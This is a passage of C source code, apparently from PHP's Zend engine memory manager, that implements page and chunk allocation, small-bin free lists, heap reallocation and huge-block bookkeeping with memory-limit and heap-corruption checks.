if (i >= free_tail || i == ZEND_MM_PAGES) {
len = ZEND_MM_PAGES - page_num;
if (len >= pages_count && len < best_len) {
chunk->free_tail = page_num + pages_count;
goto found;
} else {
/* set accurate value */
chunk->free_tail = page_num;
if (best > 0) {
page_num = best;
goto found;
} else {
goto not_found;
}
}
}
tmp = *(bitset++);
}
/* find first 1 bit */
len = i + zend_mm_bitset_ntz(tmp) - page_num;
if (len >= pages_count) {
if (len == pages_count) {
goto found;
} else if (len < best_len) {
best_len = len;
best = page_num;
}
}
/* set bits from 0 to "bit" */
tmp |= tmp - 1;
}
}
not_found:
if (chunk->next == heap->main_chunk) {
get_chunk:
if (heap->cached_chunks) {
heap->cached_chunks_count--;
chunk = heap->cached_chunks;
heap->cached_chunks = chunk->next;
} else {
#if ZEND_MM_LIMIT
if (UNEXPECTED(heap->real_size + ZEND_MM_CHUNK_SIZE > heap->limit)) {
if (zend_mm_gc(heap)) {
goto get_chunk;
} else if (heap->overflow == 0) {
#if ZEND_DEBUG
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted at %s:%d (tried to allocate %zu bytes)", heap->limit, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted (tried to allocate %zu bytes)", heap->limit, ZEND_MM_PAGE_SIZE * pages_count);
#endif
return NULL;
}
}
#endif
chunk = (zend_mm_chunk*)zend_mm_chunk_alloc(heap, ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(chunk == NULL)) {
/* insufficient memory */
if (zend_mm_gc(heap) &&
(chunk = (zend_mm_chunk*)zend_mm_chunk_alloc(heap, ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE)) != NULL) {
/* pass */
} else {
#if !ZEND_MM_LIMIT
zend_mm_safe_error(heap, "Out of memory");
#elif ZEND_DEBUG
zend_mm_safe_error(heap, "Out of memory (allocated %zu) at %s:%d (tried to allocate %zu bytes)", heap->real_size, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Out of memory (allocated %zu) (tried to allocate %zu bytes)", heap->real_size, ZEND_MM_PAGE_SIZE * pages_count);
#endif
return NULL;
}
}
#if ZEND_MM_STAT
do {
size_t size = heap->real_size + ZEND_MM_CHUNK_SIZE;
size_t peak = MAX(heap->real_peak, size);
heap->real_size = size;
heap->real_peak = peak;
} while (0);
#elif ZEND_MM_LIMIT
heap->real_size += ZEND_MM_CHUNK_SIZE;
#endif
}
heap->chunks_count++;
if (heap->chunks_count > heap->peak_chunks_count) {
heap->peak_chunks_count = heap->chunks_count;
}
zend_mm_chunk_init(heap, chunk);
page_num = ZEND_MM_FIRST_PAGE;
len = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
goto found;
} else {
chunk = chunk->next;
}
}
found:
/* mark run as allocated */
chunk->free_pages -= pages_count;
zend_mm_bitset_set_range(chunk->free_map, page_num, pages_count);
chunk->map[page_num] = ZEND_MM_LRUN(pages_count);
if (page_num == chunk->free_tail) {
chunk->free_tail = page_num + pages_count;
}
return ZEND_MM_PAGE_ADDR(chunk, page_num);
}
static zend_always_inline void *zend_mm_alloc_large(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
int pages_count = (int)ZEND_MM_SIZE_TO_NUM(size, ZEND_MM_PAGE_SIZE);
#if ZEND_DEBUG
void *ptr = zend_mm_alloc_pages(heap, pages_count, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
void *ptr = zend_mm_alloc_pages(heap, pages_count ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
#if ZEND_MM_STAT
do {
size_t size = heap->size + pages_count * ZEND_MM_PAGE_SIZE;
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#endif
return ptr;
}
static zend_always_inline void zend_mm_delete_chunk(zend_mm_heap *heap, zend_mm_chunk *chunk)
{
chunk->next->prev = chunk->prev;
chunk->prev->next = chunk->next;
heap->chunks_count--;
if (heap->chunks_count + heap->cached_chunks_count < heap->avg_chunks_count + 0.1) {
/* delay deletion */
heap->cached_chunks_count++;
chunk->next = heap->cached_chunks;
heap->cached_chunks = chunk;
} else {
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size -= ZEND_MM_CHUNK_SIZE;
#endif
if (!heap->cached_chunks || chunk->num > heap->cached_chunks->num) {
zend_mm_chunk_free(heap, chunk, ZEND_MM_CHUNK_SIZE);
} else {
//TODO: select the best chunk to delete???
chunk->next = heap->cached_chunks->next;
zend_mm_chunk_free(heap, heap->cached_chunks, ZEND_MM_CHUNK_SIZE);
heap->cached_chunks = chunk;
}
}
}
static zend_always_inline void zend_mm_free_pages_ex(zend_mm_heap *heap, zend_mm_chunk *chunk, int page_num, int pages_count, int free_chunk)
{
chunk->free_pages += pages_count;
zend_mm_bitset_reset_range(chunk->free_map, page_num, pages_count);
chunk->map[page_num] = 0;
if (chunk->free_tail == page_num + pages_count) {
/* this setting may be not accurate */
chunk->free_tail = page_num;
}
if (free_chunk && chunk->free_pages == ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE) {
zend_mm_delete_chunk(heap, chunk);
}
}
static void zend_mm_free_pages(zend_mm_heap *heap, zend_mm_chunk *chunk, int page_num, int pages_count)
{
zend_mm_free_pages_ex(heap, chunk, page_num, pages_count, 1);
}
static zend_always_inline void zend_mm_free_large(zend_mm_heap *heap, zend_mm_chunk *chunk, int page_num, int pages_count)
{
#if ZEND_MM_STAT
heap->size -= pages_count * ZEND_MM_PAGE_SIZE;
#endif
zend_mm_free_pages(heap, chunk, page_num, pages_count);
}
/**************/
/* Small Runs */
/**************/
/* higher set bit number (0->N/A, 1->1, 2->2, 4->3, 8->4, 127->7, 128->8 etc) */
static zend_always_inline int zend_mm_small_size_to_bit(int size)
{
#if (defined(__GNUC__) || __has_builtin(__builtin_clz)) && defined(PHP_HAVE_BUILTIN_CLZ)
return (__builtin_clz(size) ^ 0x1f) + 1;
#elif defined(_WIN32)
unsigned long index;
if (!BitScanReverse(&index, (unsigned long)size)) {
/* undefined behavior */
return 64;
}
return (((31 - (int)index) ^ 0x1f) + 1);
#else
int n = 16;
if (size <= 0x00ff) {n -= 8; size = size << 8;}
if (size <= 0x0fff) {n -= 4; size = size << 4;}
if (size <= 0x3fff) {n -= 2; size = size << 2;}
if (size <= 0x7fff) {n -= 1;}
return n;
#endif
}
#ifndef MAX
# define MAX(a, b) (((a) > (b)) ? (a) : (b))
#endif
#ifndef MIN
# define MIN(a, b) (((a) < (b)) ? (a) : (b))
#endif
static zend_always_inline int zend_mm_small_size_to_bin(size_t size)
{
#if 0
int n;
/*0, 1, 2, 3, 4, 5, 6, 7, 8, 9 10, 11, 12*/
static const int f1[] = { 3, 3, 3, 3, 3, 3, 3, 4, 5, 6, 7, 8, 9};
static const int f2[] = { 0, 0, 0, 0, 0, 0, 0, 4, 8, 12, 16, 20, 24};
if (UNEXPECTED(size <= 2)) return 0;
n = zend_mm_small_size_to_bit(size - 1);
return ((size-1) >> f1[n]) + f2[n];
#else
unsigned int t1, t2;
if (size <= 64) {
/* we need to support size == 0 ... */
return (size - !!size) >> 3;
} else {
t1 = size - 1;
t2 = zend_mm_small_size_to_bit(t1) - 3;
t1 = t1 >> t2;
t2 = t2 - 3;
t2 = t2 << 2;
return (int)(t1 + t2);
}
#endif
}
#define ZEND_MM_SMALL_SIZE_TO_BIN(size) zend_mm_small_size_to_bin(size)
static zend_never_inline void *zend_mm_alloc_small_slow(zend_mm_heap *heap, int bin_num ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_chunk *chunk;
int page_num;
zend_mm_bin *bin;
zend_mm_free_slot *p, *end;
#if ZEND_DEBUG
bin = (zend_mm_bin*)zend_mm_alloc_pages(heap, bin_pages[bin_num], bin_data_size[bin_num] ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
bin = (zend_mm_bin*)zend_mm_alloc_pages(heap, bin_pages[bin_num] ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
if (UNEXPECTED(bin == NULL)) {
/* insufficient memory */
return NULL;
}
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(bin, ZEND_MM_CHUNK_SIZE);
page_num = ZEND_MM_ALIGNED_OFFSET(bin, ZEND_MM_CHUNK_SIZE) / ZEND_MM_PAGE_SIZE;
chunk->map[page_num] = ZEND_MM_SRUN(bin_num);
if (bin_pages[bin_num] > 1) {
int i = 1;
do {
chunk->map[page_num+i] = ZEND_MM_NRUN(bin_num, i);
i++;
} while (i < bin_pages[bin_num]);
}
/* create a linked list of elements from 1 to last */
end = (zend_mm_free_slot*)((char*)bin + (bin_data_size[bin_num] * (bin_elements[bin_num] - 1)));
heap->free_slot[bin_num] = p = (zend_mm_free_slot*)((char*)bin + bin_data_size[bin_num]);
do {
p->next_free_slot = (zend_mm_free_slot*)((char*)p + bin_data_size[bin_num]);;
#if ZEND_DEBUG
do {
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
dbg->size = 0;
} while (0);
#endif
p = (zend_mm_free_slot*)((char*)p + bin_data_size[bin_num]);
} while (p != end);
/* terminate list using NULL */
p->next_free_slot = NULL;
#if ZEND_DEBUG
do {
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
dbg->size = 0;
} while (0);
#endif
/* return first element */
return (char*)bin;
}
static zend_always_inline void *zend_mm_alloc_small(zend_mm_heap *heap, size_t size, int bin_num ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#if ZEND_MM_STAT
do {
size_t size = heap->size + bin_data_size[bin_num];
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#endif
if (EXPECTED(heap->free_slot[bin_num] != NULL)) {
zend_mm_free_slot *p = heap->free_slot[bin_num];
heap->free_slot[bin_num] = p->next_free_slot;
return (void*)p;
} else {
return zend_mm_alloc_small_slow(heap, bin_num ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
}
static zend_always_inline void zend_mm_free_small(zend_mm_heap *heap, void *ptr, int bin_num)
{
zend_mm_free_slot *p;
#if ZEND_MM_STAT
heap->size -= bin_data_size[bin_num];
#endif
#if ZEND_DEBUG
do {
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)ptr + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
dbg->size = 0;
} while (0);
#endif
p = (zend_mm_free_slot*)ptr;
p->next_free_slot = heap->free_slot[bin_num];
heap->free_slot[bin_num] = p;
}
/********/
/* Heap */
/********/
#if ZEND_DEBUG
static zend_always_inline zend_mm_debug_info *zend_mm_get_debug_info(zend_mm_heap *heap, void *ptr)
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
zend_mm_chunk *chunk;
int page_num;
zend_mm_page_info info;
ZEND_MM_CHECK(page_offset != 0, "zend_mm_heap corrupted");
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (EXPECTED(info & ZEND_MM_IS_SRUN)) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(info);
return (zend_mm_debug_info*)((char*)ptr + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
} else /* if (info & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(info);
return (zend_mm_debug_info*)((char*)ptr + ZEND_MM_PAGE_SIZE * pages_count - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
}
}
#endif
static zend_always_inline void *zend_mm_alloc_heap(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
void *ptr;
#if ZEND_DEBUG
size_t real_size = size;
zend_mm_debug_info *dbg;
/* special handling for zero-size allocation */
size = MAX(size, 1);
size = ZEND_MM_ALIGNED_SIZE(size) + ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info));
if (UNEXPECTED(size < real_size)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu + %zu)", ZEND_MM_ALIGNED_SIZE(real_size), ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
return NULL;
}
#endif
if (size <= ZEND_MM_MAX_SMALL_SIZE) {
ptr = zend_mm_alloc_small(heap, size, ZEND_MM_SMALL_SIZE_TO_BIN(size) ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else if (size <= ZEND_MM_MAX_LARGE_SIZE) {
ptr = zend_mm_alloc_large(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else {
#if ZEND_DEBUG
size = real_size;
#endif
return zend_mm_alloc_huge(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
}
static zend_always_inline void zend_mm_free_heap(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(page_offset == 0)) {
if (ptr != NULL) {
zend_mm_free_huge(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
} else {
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
int page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
zend_mm_page_info info = chunk->map[page_num];
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (EXPECTED(info & ZEND_MM_IS_SRUN)) {
zend_mm_free_small(heap, ptr, ZEND_MM_SRUN_BIN_NUM(info));
} else /* if (info & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(info);
ZEND_MM_CHECK(ZEND_MM_ALIGNED_OFFSET(page_offset, ZEND_MM_PAGE_SIZE) == 0, "zend_mm_heap corrupted");
zend_mm_free_large(heap, chunk, page_num, pages_count);
}
}
}
static size_t zend_mm_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(page_offset == 0)) {
return zend_mm_get_huge_block_size(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
zend_mm_chunk *chunk;
#if 0 && ZEND_DEBUG
zend_mm_debug_info *dbg = zend_mm_get_debug_info(heap, ptr);
return dbg->size;
#else
int page_num;
zend_mm_page_info info;
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (EXPECTED(info & ZEND_MM_IS_SRUN)) {
return bin_data_size[ZEND_MM_SRUN_BIN_NUM(info)];
} else /* if (info & ZEND_MM_IS_LARGE_RUN) */ {
return ZEND_MM_LRUN_PAGES(info) * ZEND_MM_PAGE_SIZE;
}
#endif
}
}
static void *zend_mm_realloc_heap(zend_mm_heap *heap, void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t page_offset;
size_t old_size;
size_t new_size;
void *ret;
#if ZEND_DEBUG
size_t real_size;
zend_mm_debug_info *dbg;
#endif
page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(page_offset == 0)) {
if (UNEXPECTED(ptr == NULL)) {
return zend_mm_alloc_heap(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
old_size = zend_mm_get_huge_block_size(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_DEBUG
real_size = size;
size = ZEND_MM_ALIGNED_SIZE(size) + ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info));
#endif
if (size > ZEND_MM_MAX_LARGE_SIZE) {
#if ZEND_DEBUG
size = real_size;
#endif
#ifdef ZEND_WIN32
/* On Windows we don't have ability to extend huge blocks in-place.
* We allocate them with 2MB size granularity, to avoid many
* reallocations when they are extended by small pieces
*/
new_size = ZEND_MM_ALIGNED_SIZE_EX(size, MAX(REAL_PAGE_SIZE, ZEND_MM_CHUNK_SIZE));
#else
new_size = ZEND_MM_ALIGNED_SIZE_EX(size, REAL_PAGE_SIZE);
#endif
if (new_size == old_size) {
#if ZEND_DEBUG
zend_mm_change_huge_block_size(heap, ptr, new_size, real_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_change_huge_block_size(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
return ptr;
} else if (new_size < old_size) {
/* unmup tail */
if (zend_mm_chunk_truncate(heap, ptr, old_size, new_size)) {
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size -= old_size - new_size;
#endif
#if ZEND_MM_STAT
heap->size -= old_size - new_size;
#endif
#if ZEND_DEBUG
zend_mm_change_huge_block_size(heap, ptr, new_size, real_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_change_huge_block_size(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
return ptr;
}
} else /* if (new_size > old_size) */ {
#if ZEND_MM_LIMIT
if (UNEXPECTED(heap->real_size + (new_size - old_size) > heap->limit)) {
if (zend_mm_gc(heap) && heap->real_size + (new_size - old_size) <= heap->limit) {
/* pass */
} else if (heap->overflow == 0) {
#if ZEND_DEBUG
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted at %s:%d (tried to allocate %zu bytes)", heap->limit, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted (tried to allocate %zu bytes)", heap->limit, size);
#endif
return NULL;
}
}
#endif
/* try to map tail right after this block */
if (zend_mm_chunk_extend(heap, ptr, old_size, new_size)) {
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size += new_size - old_size;
#endif
#if ZEND_MM_STAT
heap->real_peak = MAX(heap->real_peak, heap->real_size);
heap->size += new_size - old_size;
heap->peak = MAX(heap->peak, heap->size);
#endif
#if ZEND_DEBUG
zend_mm_change_huge_block_size(heap, ptr, new_size, real_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_change_huge_block_size(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
return ptr;
}
}
}
} else {
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
int page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
zend_mm_page_info info = chunk->map[page_num];
#if ZEND_DEBUG
size_t real_size = size;
size = ZEND_MM_ALIGNED_SIZE(size) + ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info));
#endif
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (info & ZEND_MM_IS_SRUN) {
int old_bin_num, bin_num;
old_bin_num = ZEND_MM_SRUN_BIN_NUM(info);
old_size = bin_data_size[old_bin_num];
bin_num = ZEND_MM_SMALL_SIZE_TO_BIN(size);
if (old_bin_num == bin_num) {
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
}
} else /* if (info & ZEND_MM_IS_LARGE_RUN) */ {
ZEND_MM_CHECK(ZEND_MM_ALIGNED_OFFSET(page_offset, ZEND_MM_PAGE_SIZE) == 0, "zend_mm_heap corrupted");
old_size = ZEND_MM_LRUN_PAGES(info) * ZEND_MM_PAGE_SIZE;
if (size > ZEND_MM_MAX_SMALL_SIZE && size <= ZEND_MM_MAX_LARGE_SIZE) {
new_size = ZEND_MM_ALIGNED_SIZE_EX(size, ZEND_MM_PAGE_SIZE);
if (new_size == old_size) {
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else if (new_size < old_size) {
/* free tail pages */
int new_pages_count = (int)(new_size / ZEND_MM_PAGE_SIZE);
int rest_pages_count = (int)((old_size - new_size) / ZEND_MM_PAGE_SIZE);
#if ZEND_MM_STAT
heap->size -= rest_pages_count * ZEND_MM_PAGE_SIZE;
#endif
chunk->map[page_num] = ZEND_MM_LRUN(new_pages_count);
chunk->free_pages += rest_pages_count;
zend_mm_bitset_reset_range(chunk->free_map, page_num + new_pages_count, rest_pages_count);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else /* if (new_size > old_size) */ {
int new_pages_count = (int)(new_size / ZEND_MM_PAGE_SIZE);
int old_pages_count = (int)(old_size / ZEND_MM_PAGE_SIZE);
/* try to allocate tail pages after this block */
if (page_num + new_pages_count <= ZEND_MM_PAGES &&
zend_mm_bitset_is_free_range(chunk->free_map, page_num + old_pages_count, new_pages_count - old_pages_count)) {
#if ZEND_MM_STAT
do {
size_t size = heap->size + (new_size - old_size);
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#endif
chunk->free_pages -= new_pages_count - old_pages_count;
zend_mm_bitset_set_range(chunk->free_map, page_num + old_pages_count, new_pages_count - old_pages_count);
chunk->map[page_num] = ZEND_MM_LRUN(new_pages_count);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
}
}
}
}
#if ZEND_DEBUG
size = real_size;
#endif
}
/* Naive reallocation */
#if ZEND_MM_STAT
do {
size_t orig_peak = heap->peak;
size_t orig_real_peak = heap->real_peak;
#endif
ret = zend_mm_alloc_heap(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
memcpy(ret, ptr, MIN(old_size, copy_size));
zend_mm_free_heap(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_MM_STAT
heap->peak = MAX(orig_peak, heap->size);
heap->real_peak = MAX(orig_real_peak, heap->real_size);
} while (0);
#endif
return ret;
}
/*********************/
/* Huge Runs (again) */
/*********************/
#if ZEND_DEBUG
static void zend_mm_add_huge_block(zend_mm_heap *heap, void *ptr, size_t size, size_t dbg_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#else
static void zend_mm_add_huge_block(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#endif
{
zend_mm_huge_list *list = (zend_mm_huge_list*)zend_mm_alloc_heap(heap, sizeof(zend_mm_huge_list) ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
list->ptr = ptr;
list->size = size;
list->next = heap->huge_list;
#if ZEND_DEBUG
list->dbg.size = dbg_size;
list->dbg.filename = __zend_filename;
list->dbg.orig_filename = __zend_orig_filename;
list->dbg.lineno = __zend_lineno;
list->dbg.orig_lineno = __zend_orig_lineno;
#endif
heap->huge_list = list;
}
static size_t zend_mm_del_huge_block(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_huge_list *prev = NULL;
zend_mm_huge_list *list = heap->huge_list;
while (list != NULL) {
if (list->ptr == ptr) {
size_t size;
if (prev) {
prev->next = list->next;
} else {
heap->huge_list = list->next;
}
size = list->size;
zend_mm_free_heap(heap, list ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
return size;
}
prev = list;
list = list->next;
}
ZEND_MM_CHECK(0, "zend_mm_heap corrupted");
return 0;
}
static size_t zend_mm_get_huge_block_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_huge_list *list = heap->huge_list;
while (list != NULL) {
if (list->ptr == ptr) {
return list->size;
}
list = list->next;
}
ZEND_MM_CHECK(0, "zend_mm_heap corrupted");
return 0;
}
#if ZEND_DEBUG
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size, size_t dbg_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#else
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#endif
{
zend_mm_huge_list *list = heap->huge_list;
while (list != NULL) {
if (list->ptr == ptr) {
list->size = size;
#if ZEND_DEBUG
list->dbg.size = dbg_size;
list->dbg.filename = __zend_filename;
list->dbg.orig_filename = __zend_orig_filename;
list->dbg.lineno = __zend_lineno;
list->dbg.orig_lineno = __zend_orig_lineno;
#endif
return;
}
list = list->next;
}
}
static void *zend_mm_alloc_huge(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#ifdef ZEND_WIN32
/* On Windows we don't have ability to extend huge blocks in-place.
* We allocate them with 2MB size granularity, to avoid many
* reallocations when they are extended by small pieces
*/
size_t new_size = ZEND_MM_ALIGNED_SIZE_EX(size, MAX(REAL_PAGE_SIZE, ZEND_MM_CHUNK_SIZE));
#else
size_t new_size = ZEND_MM_ALIGNED_SIZE_EX(size, REAL_PAGE_SIZE);
#endif
void *ptr;
#if ZEND_MM_LIMIT
if (UNEXPECTED(heap->real_size + new_size > heap->limit)) {
if (zend_mm_gc(heap) && heap->real_size + new_size <= heap->limit) {
/* pass */
} else if (heap->overflow == 0) {
#if ZEND_DEBUG
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted at %s:%d (tried to allocate %zu bytes)", heap->limit, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted (tried to allocate %zu bytes)", heap->limit, size);
#endif
return NULL;
}
}
#endif
ptr = zend_mm_chunk_alloc(heap, new_size, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(ptr == NULL)) {
/* insufficient memory */
if (zend_mm_gc(heap) &&
(ptr = zend_mm_chunk_alloc(heap, new_size, ZEND_MM_CHUNK_SIZE)) != NULL) {
/* pass */
} else {
#if !ZEND_MM_LIMIT
zend_mm_safe_error(heap, "Out of memory");
#elif ZEND_DEBUG
zend_mm_safe_error(heap, "Out of memory (allocated %zu) at %s:%d (tried to allocate %zu bytes)", heap->real_size, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Out of memory (allocated %zu) (tried to allocate %zu bytes)", heap->real_size, size);
#endif
return NULL;
}
}
#if ZEND_DEBUG
zend_mm_add_huge_block(heap, ptr, new_size, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_add_huge_block(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
#if ZEND_MM_STAT
do {
size_t size = heap->real_size + new_size;
size_t peak = MAX(heap->real_peak, size);
heap->real_size = size;
heap->real_peak = peak;
} while (0);
do {
size_t size = heap->size + new_size;
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#elif ZEND_MM_LIMIT
heap->real_size += new_size;
#endif
return ptr;
}
